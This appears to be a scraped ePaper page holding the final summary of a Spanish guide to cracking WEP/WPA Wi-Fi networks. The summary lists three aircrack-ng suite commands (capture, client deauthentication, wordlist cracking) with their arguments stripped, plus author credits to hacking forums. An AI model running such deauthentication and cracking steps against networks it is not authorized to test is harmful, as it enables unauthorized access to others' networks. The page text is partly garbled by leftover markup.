12.07.2015 Views

ASALTANDO REDES WI-FI WEP / WPA

ASALTANDO REDES WI-FI WEP / WPA

ASALTANDO REDES WI-FI WEP / WPA

SHOW MORE
SHOW LESS

You also want an ePaper? Increase the reach of your titles

YUMPU automatically turns print PDFs into web optimized ePapers that Google loves.

RESUMEN <strong>WPA</strong>Ataque a redes <strong>WPA</strong>:1) # airodump-ng -w --bssid -c 2) # aireplay-ng -0 20 -a -c 3) # aircrack-ng -w REFERENCIAS:Suite Aircrack-ng: http://www.aircrack-ng.org/ESCRITO PARA:ArteHack: http://artehack.net/CPH: http://foro.portalhacker.net/by Aetsualpha.aetsu@gmail.comEsta obra se encuentra bajo la licencia Creative Commons 3.0 - España17

Hooray! Your file is uploaded and ready to be published.

Saved successfully!

Ooh no, something went wrong!